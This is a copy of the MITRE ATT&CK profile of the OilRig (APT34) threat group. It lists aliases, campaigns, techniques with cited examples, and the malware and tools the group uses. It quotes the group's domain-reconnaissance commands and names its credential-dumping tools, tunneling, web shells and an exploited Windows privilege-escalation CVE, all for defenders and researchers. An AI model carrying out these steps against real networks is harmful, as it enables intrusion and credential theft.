Group description: OilRig
quality 2/10 · low quality
0 net
Tags
OilRig, COBALT GYPSY, IRN2, APT34, Helix Kitten, Evasive Serpens, Hazel Sandstorm, EUROPIUM, ITG13, Earth Simnavaz, Crambus, TA452, Group G0049 | MITRE ATT&CK®
ATT&CK v19 will be released April 28th! Check out this blog post for information on the planned deprecation of Enterprise's Defense Evasion tactic in the upcoming release.
Home
Groups
OilRig
OilRig
OilRig is a suspected Iranian threat group that has targeted Middle Eastern and international victims since at least 2014. The group has targeted a variety of sectors, including financial, government, energy, chemical, and telecommunications. It appears the group carries out supply chain attacks, leveraging the trust relationship between organizations to attack their primary targets. The group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. [1] [2] [3] [4] [5] [6] [7]
ID: G0049
ⓘ
Associated Groups : COBALT GYPSY, IRN2, APT34, Helix Kitten, Evasive Serpens, Hazel Sandstorm, EUROPIUM, ITG13, Earth Simnavaz, Crambus, TA452
Contributors : Robert Falcone; Bryan Lee; Dragos Threat Intelligence; Jaesang Oh, KC7 Foundation
Version : 5.0
Created: 14 December 2017
Last Modified: 16 January 2025
Version Permalink
Live Version
Associated Group Descriptions
Name
Description
COBALT GYPSY
[8]
IRN2
[9]
APT34
This group was previously tracked under two distinct groups, APT34 and OilRig, but was combined due to additional reporting giving higher confidence about the overlap of the activity. [7] [1] [10]
Helix Kitten
[7] [9]
Evasive Serpens
[6]
Hazel Sandstorm
[11]
EUROPIUM
[11]
ITG13
[12]
Earth Simnavaz
[13]
Crambus
[14]
TA452
[15]
Campaigns
ID
Name
First Seen
Last Seen
References
Techniques
C0044
Juicy Mix
January 2022 [16]
December 2022 [16]
[16]
Application Layer Protocol : Web Protocols , Browser Information Discovery , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Visual Basic , Compromise Infrastructure : Server , Credentials from Password Stores : Windows Credential Manager , Credentials from Password Stores : Credentials from Web Browsers , Data Encoding : Standard Encoding , Data Staged : Local Data Staging , Deobfuscate/Decode Files or Information , Develop Capabilities : Malware , Scheduled Task/Job : Scheduled Task , Software Discovery , System Information Discovery
C0042
Outer Space
January 2021 [16]
December 2021 [16]
[16]
Application Layer Protocol : Web Protocols , Browser Information Discovery , Command and Scripting Interpreter : Visual Basic , Compromise Infrastructure : Server , Develop Capabilities : Malware , Establish Accounts : Cloud Accounts , Ingress Tool Transfer , Obfuscated Files or Information : Encrypted/Encoded File
ATT&CK ® Navigator Layers
Enterprise Layer
download
view
ICS Layer
download
view
Techniques Used
Domain
ID
Name
Use
Enterprise
T1087
.001
Account Discovery : Local Account
OilRig has run net user , net user /domain , net group "domain admins" /domain , and net group "Exchange Trusted Subsystem" /domain to get account listings on a victim. [4]
.002
Account Discovery : Domain Account
OilRig has run net user , net user /domain , net group "domain admins" /domain , and net group "Exchange Trusted Subsystem" /domain to get account listings on a victim. [4]
Enterprise
T1583
.001
Acquire Infrastructure : Domains
OilRig has set up fake VPN portals, conference sign ups, and job application websites to target victims. [3]
Enterprise
T1071
.001
Application Layer Protocol : Web Protocols
OilRig has used HTTP for C2. [6] [17] [18]
During Outer Space , OilRig used HTTP to communicate between installed backdoors and compromised servers including via the Microsoft Exchange Web Services API. [16]
During Juicy Mix , OilRig used a VBS script to send POST requests to register installed malware with C2. [16]
.004
Application Layer Protocol : DNS
OilRig has used DNS for C2 including the publicly available requestbin.net tunneling service. [6] [17] [18] [10]
Enterprise
T1119
Automated Collection
OilRig has used automated collection. [6]
Enterprise
T1217
Browser Information Discovery
During Outer Space , OilRig used a Chrome data dumper named MKG. [16]
During Juicy Mix , OilRig used the CDumper (Chrome browser) and EDumper (Edge browser) data stealers to collect cookies, browsing history, and credentials. [16]
Enterprise
T1110
Brute Force
OilRig has used brute force techniques to obtain credentials. [17] [12]
Enterprise
T1115
Clipboard Data
OilRig has used infostealer tools to copy clipboard data. [14]
Enterprise
T1059
Command and Scripting Interpreter
OilRig has used various types of scripting for execution. [1] [19] [20] [7] [21]
.001
PowerShell
OilRig has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents. [1] [22] [9] [13]
During Juicy Mix , OilRig used a PowerShell script to steal credentials. [16]
.003
Windows Command Shell
OilRig has used macros to deliver malware such as QUADAGENT and OopsIE . [1] [19] [20] [7] [21] OilRig has used batch scripts. [1] [19] [20] [7] [21]
.005
Visual Basic
OilRig has used VBScript macros for execution on compromised hosts. [10]
During Outer Space , OilRig used VBS droppers to deploy malware. [16]
During Juicy Mix , OilRig used VBS droppers to deliver and establish persistence for the Mango backdoor. [16]
Enterprise
T1586
.002
Compromise Accounts : Email Accounts
OilRig has compromised email accounts to send phishing emails. [3]
Enterprise
T1584
.004
Compromise Infrastructure : Server
During Outer Space , OilRig compromised an Israeli human resources site to use as a C2 server. [16]
During Juicy Mix , OilRig compromised an Israeli job portal to use for a C2 server. [16]
Enterprise
T1543
.003
Create or Modify System Process : Windows Service
OilRig has used a compromised Domain Controller to create a service on a remote host. [14]
Enterprise
T1555
Credentials from Password Stores
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
.003
Credentials from Web Browsers
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18] OilRig has also used tool named PICKPOCKET to dump passwords from web browsers. [18]
During Juicy Mix , OilRig used the CDumper (Chrome browser) and EDumper (Edge browser) to collect credentials. [16]
.004
Windows Credential Manager
OilRig has used credential dumping tool named VALUEVAULT to steal credentials from the Windows Credential Manager. [18]
During Juicy Mix , OilRig used a Windows Credential Manager stealer for credential access. [16]
Enterprise
T1132
.001
Data Encoding : Standard Encoding
During Juicy Mix , OilRig used a VBS script to send the Base64-encoded name of the compromised computer to C2. [16]
Enterprise
T1005
Data from Local System
OilRig has used PowerShell to upload files from compromised systems. [13]
Enterprise
T1025
Data from Removable Media
OilRig has used Wireshark’s usbcapcmd utility to capture USB traffic. [14]
Enterprise
T1074
.001
Data Staged : Local Data Staging
During Juicy Mix , OilRig used browser data and credential stealer tools to stage stolen files named Cupdate, Eupdate, and IUpdate in the %TEMP% directory. [16]
Enterprise
T1140
Deobfuscate/Decode Files or Information
A OilRig macro has run a PowerShell command to decode file contents. OilRig has also used certutil to decode base64-encoded files on victims. [1] [22] [20] [24]
During Juicy Mix , OilRig used a script to concatenate and deobfuscate encoded strings in Mango . [16]
Enterprise
T1587
.001
Develop Capabilities : Malware
OilRig actively developed and used a series of downloaders during 2022. [25]
For Outer Space , OilRig created new implants including the Solar backdoor. [16]
For Juicy Mix , OilRig improved on Solar by developing the Mango backdoor. [16]
Enterprise
T1573
.002
Encrypted Channel : Asymmetric Cryptography
OilRig used the PowerExchange utility and other tools to create tunnels to C2 servers. [17]
Enterprise
T1585
.003
Establish Accounts : Cloud Accounts
During Outer Space , OilRig created M365 email accounts to be used as part of C2. [16]
Enterprise
T1048
.003
Exfiltration Over Alternative Protocol : Exfiltration Over Unencrypted Non-C2 Protocol
OilRig has exfiltrated data via Microsoft Exchange and over FTP separately from its primary C2 channel over DNS. [5] [13]
Enterprise
T1203
Exploitation for Client Execution
OilRig has exploited CVE-2024-30088 to run arbitrary code in the context of SYSTEM . [13]
Enterprise
T1068
Exploitation for Privilege Escalation
OilRig has exploited the Windows Kernel Elevation of Privilege vulnerability, CVE-2024-30088. [13]
Enterprise
T1133
External Remote Services
OilRig uses remote services such as VPN, Citrix, or OWA to persist in an environment. [17]
Enterprise
T1008
Fallback Channels
OilRig malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP. [19]
Enterprise
T1562
.004
Impair Defenses : Disable or Modify System Firewall
OilRig has modified Windows firewall rules to enable remote access. [14]
Enterprise
T1070
.004
Indicator Removal : File Deletion
OilRig has deleted files associated with their payload after execution. [1] [20]
Enterprise
T1105
Ingress Tool Transfer
OilRig had downloaded remote files onto victim infrastructure. [1] [13]
During Outer Space , OilRig downloaded additional tools to comrpomised infrastructure. [16]
Enterprise
T1056
.001
Input Capture : Keylogging
OilRig has employed keyloggers including KEYPUNCH and LONGWATCH. [17] [18] [14]
Enterprise
T1036
Masquerading
OilRig has used .doc file extensions to mask malicious executables. [10]
.005
Match Legitimate Resource Name or Location
OilRig has named a downloaded copy of the Plink tunneling utility as \ProgramData\Adobe.exe. [14]
Enterprise
T1556
.002
Modify Authentication Process : Password Filter DLL
OilRig has registered a password filter DLL in order to drop malware. [13]
Enterprise
T1112
Modify Registry
OilRig has used reg.exe to modify system configuration. [14] [13]
Enterprise
T1046
Network Service Discovery
OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning. [17]
Enterprise
T1027
.005
Obfuscated Files or Information : Indicator Removal from Tools
OilRig has tested malware samples to determine AV detection and subsequently modified the samples to ensure AV evasion. [2] [21]
.013
Obfuscated Files or Information : Encrypted/Encoded File
OilRig has encrypted and encoded data in its malware, including by using base64. [1] [7] [6] [9] [21]
During Outer Space , OilRig deployed VBS droppers with obfuscated strings. [16]
Enterprise
T1588
.002
Obtain Capabilities : Tool
OilRig has made use of the publicly available tools including Plink and Mimikatz . [14] [13]
.003
Obtain Capabilities : Code Signing Certificates
OilRig has obtained stolen code signing certificates to digitally sign malware. [3]
Enterprise
T1137
.004
Office Application Startup : Outlook Home Page
OilRig has abused the Outlook Home Page feature for persistence. OilRig has also used CVE-2017-11774 to roll back the initial patch designed to protect against Home Page abuse. [26]
Enterprise
T1003
.001
OS Credential Dumping : LSASS Memory
OilRig has used credential dumping tools such as Mimikatz to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
.004
OS Credential Dumping : LSA Secrets
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
.005
OS Credential Dumping : Cached Domain Credentials
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
Enterprise
T1201
Password Policy Discovery
OilRig has used net.exe in a script with net accounts /domain to find the password policy of a domain. [27]
Enterprise
T1120
Peripheral Device Discovery
OilRig has used tools to identify if a mouse is connected to a targeted system. [10]
Enterprise
T1069
.001
Permission Groups Discovery : Local Groups
OilRig has used net localgroup administrators to find local administrators on compromised systems. [4] [14]
.002
Permission Groups Discovery : Domain Groups
OilRig has used net group /domain , net group "domain admins" /domain , and net group "Exchange Trusted Subsystem" /domain to find domain group permission settings. [4]
Enterprise
T1566
.001
Phishing : Spearphishing Attachment
OilRig has sent spearphising emails with malicious attachments to potential victims using compromised and/or spoofed email accounts. [20] [7] [9] [3]
.002
Phishing : Spearphishing Link
OilRig has sent spearphising emails with malicious links to potential victims. [20] [3]
.003
Phishing : Spearphishing via Service
OilRig has used LinkedIn to send spearphishing links. [18]
Enterprise
T1057
Process Discovery
OilRig has run tasklist on a victim's machine and used infostealers to capture processes. [4] [14]
Enterprise
T1572
Protocol Tunneling
OilRig has used the Plink utility and other tools to create tunnels to C2 servers. [6] [17] [18] [14]
Enterprise
T1012
Query Registry
OilRig has used reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" on a victim to query the Registry. [4]
Enterprise
T1219
Remote Access Tools
OilRig has incorporated remote monitoring and management (RMM) tools into their operations including ngrok . [13]
Enterprise
T1021
.001
Remote Services : Remote Desktop Protocol
OilRig has used Remote Desktop Protocol for lateral movement. The group has also used tunneling tools to tunnel RDP into the environment. [6] [17] [24] [14] [14]
.004
Remote Services : SSH
OilRig has used Putty to access compromised systems. [6]
Enterprise
T1053
.005
Scheduled Task/Job : Scheduled Task
OilRig has created scheduled tasks that run a VBScript to execute a payload on victim machines. [20] [7] [18] [10]
During Juicy Mix , OilRig used VBS droppers to schedule tasks for persistence. [16]
Enterprise
T1113
Screen Capture
OilRig has a tool called CANDYKING to capture a screenshot of user's desktop. [17]
Enterprise
T1505
.003
Server Software Component : Web Shell
OilRig has used web shells, often to maintain access to a victim network. [6] [17] [24] [13]
Enterprise
T1518
Software Discovery
During Juicy Mix , OilRig used browser data dumper tools to create a list of users with Google Chrome installed. [16]
Enterprise
T1608
.001
Stage Capabilities : Upload Malware
OilRig has hosted malware on fake websites designed to target specific audiences. [3]
Enterprise
T1553
.002
Subvert Trust Controls : Code Signing
OilRig has signed its malware with stolen certificates. [3]
Enterprise
T1195
Supply Chain Compromise
OilRig has leveraged compromised organizations to conduct supply chain attacks on government entities. [13]
Enterprise
T1218
.001
System Binary Proxy Execution : Compiled HTML File
OilRig has used a CHM payload to load and execute another malicious file once delivered to a victim. [4]
Enterprise
T1082
System Information Discovery
OilRig has run hostname and systeminfo on a victim. [4] [5] [18] [10] [14]
During Juicy Mix , OilRig used a script to send the name of the compromised host via HTTP POST to register it with C2. [16]
Enterprise
T1016
System Network Configuration Discovery
OilRig has run ipconfig /all on a victim. [4] [5]
Enterprise
T1049
System Network Connections Discovery
OilRig has used netstat -an on a victim to get a listing of network connections. [4]
Enterprise
T1033
System Owner/User Discovery
OilRig has run whoami on a victim. [4] [5] [10]
Enterprise
T1007
System Service Discovery
OilRig has used sc query on a victim to gather information about services. [4]
Enterprise
T1552
.001
Unsecured Credentials : Credentials In Files
OilRig has used credential dumping tools such as LaZagne to steal credentials to accounts logged into the compromised system and to Outlook Web Access. [6] [17] [23] [18]
Enterprise
T1204
.001
User Execution : Malicious Link
OilRig has delivered malicious links to achieve execution on the target system. [20] [7] [9] [3]
.002
User Execution : Malicious File
OilRig has delivered macro-enabled documents that required targets to click the "enable content" button to execute the payload on the system. [20] [7] [9] [10] [3]
Enterprise
T1078
Valid Accounts
OilRig has used compromised credentials to access other systems on a victim network. [6] [17] [24] [12]
.002
Domain Accounts
OilRig has used an exfiltration tool named STEALHOOK to retreive valid domain credentials. [13]
Enterprise
T1497
.001
Virtualization/Sandbox Evasion : System Checks
OilRig has used macros to verify if a mouse is connected to a compromised machine. [10]
Enterprise
T1047
Windows Management Instrumentation
OilRig has used WMI for execution. [17] [14]
ICS
T0817
Drive-by Compromise
OilRig has been seen utilizing watering hole attacks to collect credentials which could be used to gain access into ICS networks. [28]
ICS
T0853
Scripting
OilRig has embedded a macro within spearphishing attachments that has been made up of both a VBScript and a PowerShell script. [29]
ICS
T0865
Spearphishing Attachment
OilRig used spearphishing emails with malicious Microsoft Excel spreadsheet attachments. [29]
ICS
T0869
Standard Application Layer Protocol
OilRig communicated with its command and control using HTTP requests. [29]
ICS
T0859
Valid Accounts
OilRig utilized stolen credentials to gain access to victim machines. [30]
Software
ID
Name
References
Techniques
S0360
BONDUPDATER
[1] [31]
Application Layer Protocol : DNS , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : PowerShell , Dynamic Resolution : Domain Generation Algorithms , Hide Artifacts : Hidden Window , Ingress Tool Transfer , Scheduled Task/Job : Scheduled Task
S0160
certutil
[1] [14]
Archive Collected Data : Archive via Utility , Deobfuscate/Decode Files or Information , Ingress Tool Transfer , Subvert Trust Controls : Install Root Certificate
S0095
ftp
[5]
Exfiltration Over Alternative Protocol : Exfiltration Over Unencrypted Non-C2 Protocol , Ingress Tool Transfer , Lateral Tool Transfer
S0170
Helminth
[4] [17] [9]
Application Layer Protocol : DNS , Application Layer Protocol : Web Protocols , Automated Collection , Boot or Logon Autostart Execution : Registry Run Keys / Startup Folder , Boot or Logon Autostart Execution : Shortcut Modification , Clipboard Data , Command and Scripting Interpreter : PowerShell , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : Windows Command Shell , Data Encoding : Standard Encoding , Data Staged : Local Data Staging , Data Transfer Size Limits , Encrypted Channel : Symmetric Cryptography , Ingress Tool Transfer , Input Capture : Keylogging , Obfuscated Files or Information : Encrypted/Encoded File , Permission Groups Discovery : Local Groups , Permission Groups Discovery : Domain Groups , Process Discovery , Scheduled Task/Job : Scheduled Task , Subvert Trust Controls : Code Signing
S0100
ipconfig
[4]
System Network Configuration Discovery
S0189
ISMInjector
[22]
Deobfuscate/Decode Files or Information , Obfuscated Files or Information , Process Injection : Process Hollowing , Scheduled Task/Job : Scheduled Task
S0349
LaZagne
[23]
Credentials from Password Stores : Windows Credential Manager , Credentials from Password Stores : Credentials from Web Browsers , Credentials from Password Stores , Credentials from Password Stores : Keychain , OS Credential Dumping : LSA Secrets , OS Credential Dumping : /etc/passwd and /etc/shadow , OS Credential Dumping : LSASS Memory , OS Credential Dumping : Cached Domain Credentials , OS Credential Dumping : Proc Filesystem , Unsecured Credentials : Credentials In Files
S1169
Mango
[16]
Application Layer Protocol : Web Protocols , Data Encoding : Standard Encoding , Encrypted Channel : Symmetric Cryptography , Encrypted Channel : Asymmetric Cryptography , Exfiltration Over C2 Channel , File and Directory Discovery , Impair Defenses : Disable or Modify Tools , Native API , Obfuscated Files or Information : Encrypted/Encoded File , Scheduled Task/Job : Scheduled Task , System Information Discovery , System Owner/User Discovery , User Execution : Malicious File
S0002
Mimikatz
[6] [17] [23] [14]
Access Token Manipulation : SID-History Injection , Account Manipulation , Boot or Logon Autostart Execution : Security Support Provider , Credentials from Password Stores , Credentials from Password Stores : Credentials from Web Browsers , Credentials from Password Stores : Windows Credential Manager , OS Credential Dumping : DCSync , OS Credential Dumping : Security Account Manager , OS Credential Dumping : LSASS Memory , OS Credential Dumping : LSA Secrets , Rogue Domain Controller , Steal or Forge Authentication Certificates , Steal or Forge Kerberos Tickets : Golden Ticket , Steal or Forge Kerberos Tickets : Silver Ticket , Unsecured Credentials : Private Keys , Use Alternate Authentication Material : Pass the Hash , Use Alternate Authentication Material : Pass the Ticket
S0039
Net
[4] [1] [14]
Account Discovery : Domain Account , Account Discovery : Local Account , Account Manipulation : Additional Local or Domain Groups , Create Account : Local Account , Create Account : Domain Account , Indicator Removal : Network Share Connection Removal , Network Share Discovery , Password Policy Discovery , Permission Groups Discovery : Domain Groups , Permission Groups Discovery : Local Groups , Remote Services : SMB/Windows Admin Shares , Remote System Discovery , System Network Connections Discovery , System Service Discovery , System Services : Service Execution , System Time Discovery
S0104
netstat
[4] [1] [14]
System Network Connections Discovery
S0508
ngrok
[13]
Dynamic Resolution : Domain Generation Algorithms , Exfiltration Over Web Service , Protocol Tunneling , Proxy , Web Service
S1170
ODAgent
[25]
Command and Scripting Interpreter : Windows Command Shell , Deobfuscate/Decode Files or Information , Exfiltration Over C2 Channel , Exfiltration Over Web Service : Exfiltration to Cloud Storage , File and Directory Discovery , Indicator Removal : File Deletion , Ingress Tool Transfer , Native API , Web Service : Bidirectional Communication
S1172
OilBooster
[25]
Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : Windows Command Shell , Data Staged : Local Data Staging , Deobfuscate/Decode Files or Information , Encrypted Channel : Asymmetric Cryptography , Exfiltration Over C2 Channel , Exfiltration Over Web Service : Exfiltration to Cloud Storage , Fallback Channels , Hide Artifacts : Hidden Window , Ingress Tool Transfer , Inter-Process Communication , Native API , System Information Discovery , System Owner/User Discovery , Web Service : Bidirectional Communication
S1171
OilCheck
[25]
Exfiltration Over Web Service , Ingress Tool Transfer , Web Service : Bidirectional Communication
S0264
OopsIE
[20]
Application Layer Protocol : Web Protocols , Archive Collected Data : Archive via Custom Method , Archive Collected Data : Archive via Utility , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : Visual Basic , Data Encoding : Standard Encoding , Data Staged : Local Data Staging , Data Transfer Size Limits , Deobfuscate/Decode Files or Information , Exfiltration Over C2 Channel , Indicator Removal : File Deletion , Ingress Tool Transfer , Obfuscated Files or Information : Software Packing , Obfuscated Files or Information , Scheduled Task/Job : Scheduled Task , System Information Discovery , System Time Discovery , Virtualization/Sandbox Evasion : System Checks , Windows Management Instrumentation
S1173
PowerExchange
[14]
Application Layer Protocol : Mail Protocols , Command and Scripting Interpreter : PowerShell , Deobfuscate/Decode Files or Information , Exfiltration Over C2 Channel , Ingress Tool Transfer
S0184
POWRUNER
[1]
Account Discovery : Domain Account , Application Layer Protocol : Web Protocols , Application Layer Protocol : DNS , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : PowerShell , Data Encoding : Standard Encoding , File and Directory Discovery , Ingress Tool Transfer , Permission Groups Discovery : Domain Groups , Permission Groups Discovery : Local Groups , Process Discovery , Query Registry , Scheduled Task/Job : Scheduled Task , Screen Capture , Software Discovery : Security Software Discovery , System Information Discovery , System Network Configuration Discovery , System Network Connections Discovery , System Owner/User Discovery , Windows Management Instrumentation
S0029
PsExec
[17]
Create Account : Domain Account , Create or Modify System Process : Windows Service , Lateral Tool Transfer , Remote Services : SMB/Windows Admin Shares , System Services : Service Execution
S0269
QUADAGENT
[7]
Application Layer Protocol : DNS , Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : Visual Basic , Command and Scripting Interpreter : Windows Command Shell , Command and Scripting Interpreter : PowerShell , Data Encoding : Standard Encoding , Deobfuscate/Decode Files or Information , Fallback Channels , Indicator Removal : File Deletion , Masquerading : Match Legitimate Resource Name or Location , Modify Registry , Obfuscated Files or Information : Command Obfuscation , Obfuscated Files or Information : Fileless Storage , Query Registry , Scheduled Task/Job : Scheduled Task , System Network Configuration Discovery , System Owner/User Discovery
S0495
RDAT
[32]
Application Layer Protocol : Web Protocols , Application Layer Protocol : DNS , Application Layer Protocol : Mail Protocols , Command and Scripting Interpreter : Windows Command Shell , Create or Modify System Process : Windows Service , Data Encoding : Standard Encoding , Data Encoding : Non-Standard Encoding , Data Obfuscation : Steganography , Data Obfuscation , Data Transfer Size Limits , Deobfuscate/Decode Files or Information , Encrypted Channel : Symmetric Cryptography , Exfiltration Over C2 Channel , Fallback Channels , Indicator Removal : File Deletion , Ingress Tool Transfer , Masquerading : Masquerade Task or Service , Masquerading : Match Legitimate Resource Name or Location , Obfuscated Files or Information : Steganography , Screen Capture
S0075
Reg
[4] [1]
Modify Registry , Query Registry , Unsecured Credentials : Credentials in Registry
S0258
RGDoor
[33]
Application Layer Protocol : Web Protocols , Archive Collected Data : Archive via Custom Method , Command and Scripting Interpreter : Windows Command Shell , Deobfuscate/Decode Files or Information , Ingress Tool Transfer , Server Software Component : IIS Components , System Owner/User Discovery
S1168
SampleCheck5000
[16]
Application Layer Protocol : Web Protocols , Archive Collected Data : Archive via Utility , Command and Scripting Interpreter : Windows Command Shell , Data Staged : Local Data Staging , Deobfuscate/Decode Files or Information , Exfiltration Over Web Service , Ingress Tool Transfer , Local Storage Discovery , System Information Discovery , Web Service : Bidirectional Communication
S0185
SEASHARPEE
[17]
Command and Scripting Interpreter : Windows Command Shell , Indicator Removal : Timestomp , Ingress Tool Transfer , Server Software Component : Web Shell
S0610
SideTwist
[10]
Application Layer Protocol : Web Protocols , Command and Scripting Interpreter : Windows Command Shell , Data Encoding : Standard Encoding , Data from Local System , Data Obfuscation , Deobfuscate/Decode Files or Information , Encrypted Channel : Symmetric Cryptography , Exfiltration Over C2 Channel , Fallback Channels , File and Directory Discovery , Ingress Tool Transfer , Native API , System Information Discovery , System Network Configuration Discovery , System Owner/User Discovery
S1166
Solar
[16]
Automated Exfiltration , Data Encoding : Standard Encoding , Encrypted Channel : Symmetric Cryptography , Exfiltration Over C2 Channel , Indicator Removal : File Deletion , Ingress Tool Transfer , Scheduled Task/Job : Scheduled Task , System Information Discovery
S0096
Systeminfo
[1]
System Information Discovery
S0057
Tasklist
[4] [1]
Process Discovery , Software Discovery : Security Software Discovery , System Service Discovery
S1151
ZeroCleare
OilRig collaborated on the destructive portion of the ZeroCleare attack. [12]
Command and Scripting Interpreter , Command and Scripting Interpreter : PowerShell , Disk Wipe : Disk Structure Wipe , Exploitation for Privilege Escalation , Indicator Removal : File Deletion , Local Storage Discovery , Native API , Subvert Trust Controls : Code Signing
References
Sardiwal, M, et al. (2017, December 7). New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit. Retrieved December 20, 2017.
Falcone, R.. (2017, April 27). OilRig Actors Provide a Glimpse into Development and Testing Efforts. Retrieved May 3, 2017.
ClearSky Cybersecurity. (2017, January 5). Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford. Retrieved May 3, 2017.
Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
Grunzweig, J. and Falcone, R.. (2016, October 4). OilRig Malware Campaign Updates Toolset and Expands Targets. Retrieved May 3, 2017.
Unit42. (2016, May 1). Evasive Serpens Unit 42 Playbook Viewer. Retrieved February 6, 2023.
Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.
Secureworks. (n.d.). COBALT GYPSY Threat Profile. Retrieved April 14, 2021.
Meyers, A. (2018, November 27). Meet CrowdStrike’s Adversary of the Month for November: HELIX KITTEN. Retrieved December 18, 2018.
Check Point. (2021, April 8). Iran’s APT34 Returns with an Updated Arsenal. Retrieved May 5, 2021.
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Kessem, L. (2019, December 4). New Destructive Wiper ZeroCleare Targets Energy Sector in the Middle East. Retrieved September 4, 2024.
Fahmy, M. et al. (2024, October 11). Earth Simnavaz (aka APT34) Levies Advanced Cyberattacks Against Middle East. Retrieved November 27, 2024.
Symantec Threat Hunter Team. (2023, October 19). Crambus: New Campaign Targets Middle Eastern Government. Retrieved November 27, 2024.
Proofpoint. (2020, January 10). Iranian State-Sponsored and Aligned Attacks: What You Need to Know and Steps to Protect Yourself. Retrieved January 16, 2025.
Hromcova, Z. and Burgher, A. (2023, September 21). OilRig’s Outer Space and Juicy Mix: Same ol’ rig, new drill pipes. Retrieved November 21, 2024.
Davis, S. and Caban, D. (2017, December 19). APT34 - New Targeted Attack in the Middle East. Retrieved December 20, 2017.
Bromiley, M., et al.. (2019, July 18). Hard Pass: Declining APT34’s Invite to Join Their Professional Network. Retrieved August 26, 2019.
Falcone, R. and Lee, B. (2017, July 27). OilRig Uses ISMDoor Variant; Possibly Linked to Greenbug Threat Group. Retrieved January 8, 2018.
Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
Falcone, R., Wilhoit, K.. (2018, November 16). Analyzing OilRig’s Ops Tempo from Testing to Weaponization to Delivery. Retrieved April 23, 2019.
Falcone, R. and Lee, B. (2017, October 9). OilRig Group Steps Up Attacks with New Delivery Documents and New Injector Trojan. Retrieved January 8, 2018.
Mandiant. (2018). Mandiant M-Trends 2018. Retrieved November 17, 2024.
Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.
Hromcova, Z. and Burgher, A. (2023, December 14). OilRig’s persistent attacks using cloud service-powered downloaders. Retrieved November 26, 2024.
McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.
Singh, S., Yin, H. (2016, May 22). https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html. Retrieved November 17, 2024.
Eduard Kovacs 2018, May 21 Group linked to Shamoon attacks targeting ICS networks in Middle East and UK Retrieved September 12, 2024.
Robert Falcone, Bryan Lee 2016, May 26 The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor Retrieved. 2019/11/19
Dragos Chrysene Retrieved. 2019/10/27
Wilhoit, K. and Falcone, R. (2018, September 12). OilRig Uses Updated BONDUPDATER to Target Middle Eastern Government. Retrieved February 18, 2019.
Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor on Targets in the Middle East. Retrieved July 6, 2018.
×
load more results